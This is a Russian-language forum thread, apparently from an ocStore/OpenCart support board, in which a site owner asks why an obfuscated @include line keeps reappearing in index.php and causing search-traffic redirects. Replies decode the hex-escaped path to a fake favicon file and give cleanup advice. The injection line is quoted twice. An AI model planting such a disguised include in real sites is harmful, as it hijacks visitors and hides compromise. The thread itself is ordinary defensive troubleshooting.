kate1987

В файл добавляется сторонний код

Рекомендуемые сообщения

kate1987    37

Здравствуйте. Использую ocStore-1.5.5.1.2

Заметила что в index.php постоянно добавляется код (даже после удаления) в корне сайта и в админ папке.

/*16736*/

@include "\x2fva\x72/w\x77w/\x72oy\x61la\x73si\x73ta\x6ets\x2fro\x79al\x2das\x73is\x74an\x74s.\x63om\x2fad\x6din\x2fmo\x64el\x2fsa\x6ce/\x66av\x69co\x6e_0\x3931\x651.\x69co";

/*16736*/

В результате при переходе с поисковой фразы гугл идет редирект на левый сайт. Сайт был проверен и почищен, изменены права на папки и файлы. Единственное вот добавляется этот код который отсутствует в оригинальном файле. Прошу помощи

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
nikifalex    398

плохо проверили и плохо почистили от вирусов

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Kindzaza    42
12 минут назад, kate1987 сказал:

Здравствуйте. Использую ocStore-1.5.5.1.2

Заметила что в index.php постоянно добавляется код (даже после удаления) в корне сайта и в админ папке.

/*16736*/

@include "\x2fva\x72/w\x77w/\x72oy\x61la\x73si\x73ta\x6ets\x2fro\x79al\x2das\x73is\x74an\x74s.\x63om\x2fad\x6din\x2fmo\x64el\x2fsa\x6ce/\x66av\x69co\x6e_0\x3931\x651.\x69co";

/*16736*/

В результате при переходе с поисковой фразы гугл идет редирект на левый сайт. Сайт был проверен и почищен, изменены права на папки и файлы. Единственное вот добавляется этот код который отсутствует в оригинальном файле. Прошу помощи

там посмотрите, куда ссылка ведет
<?   /*16736*/

@include "/var/www/royalassistants/royal-assistants.com/admin/model/sale/favicon_0931e1.ico";

/*16736*/  ?>

А вообще все проверять надо.

Изменено пользователем Kindzaza

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
kate1987    37

Проверила касперским, удалила все вирусные файлы. Но инклуд  этот все равно добавляется. Данных файлов на которые ссылается инклуд уже нет. Как и файлов типа saaplxah.php с троянами

 

Файлы еще раз были перезалиты и перепроверены. Редирект на левый сайт с гугла ушел.

Изменено пользователем kate1987

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Shkip    34

сталкивался с такой проблемой. соседи по серверу заразные оказались, решилось все сменой хостинга.

 

ЗЫ посмотрите логи сервера

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
kate1987    37

Поменяла уже хостинг. Но мб не до конца почистила. Пока вирусные файлы не генерируются, но код инклуд добавляется.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Shureg    160
Цитата

Проверила касперским, удалила все вирусные файлы.

это плохой выбор в данном случае. Проверьте хотя бы айболитом

https://www.revisium.com/ai/

а вообще, если тот, кто получил доступ, имеет хоть какую-то квалификацию и желание, без проблем сделает себе вполне аккуратную, не вызывающую подозрений дырку, которую вы сканером не найдете. Только вдумчивым анализом логов, изменений  и пр.

Для начал стоит задуматься, как получилось, что для файлов разрешена запись:

Цитата

Заметила что в index.php постоянно добавляется код (даже после удаления) в корне сайта и в админ папке.

 

Изменено пользователем Shureg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
kate1987    37

Права на файл 644. Так что даже не знаю как код туда добавляется

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Dotrox    349
42 минуты назад, kate1987 сказал:

Права на файл 644. Так что даже не знаю как код туда добавляется

Поставьте 444 и тогда это действительно станет интересным вопросом, а 644 позволяют записывать владельцу.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
kate1987    37

Уже не записывается. Видно что то не дочищено было. Спасибо

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти


  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу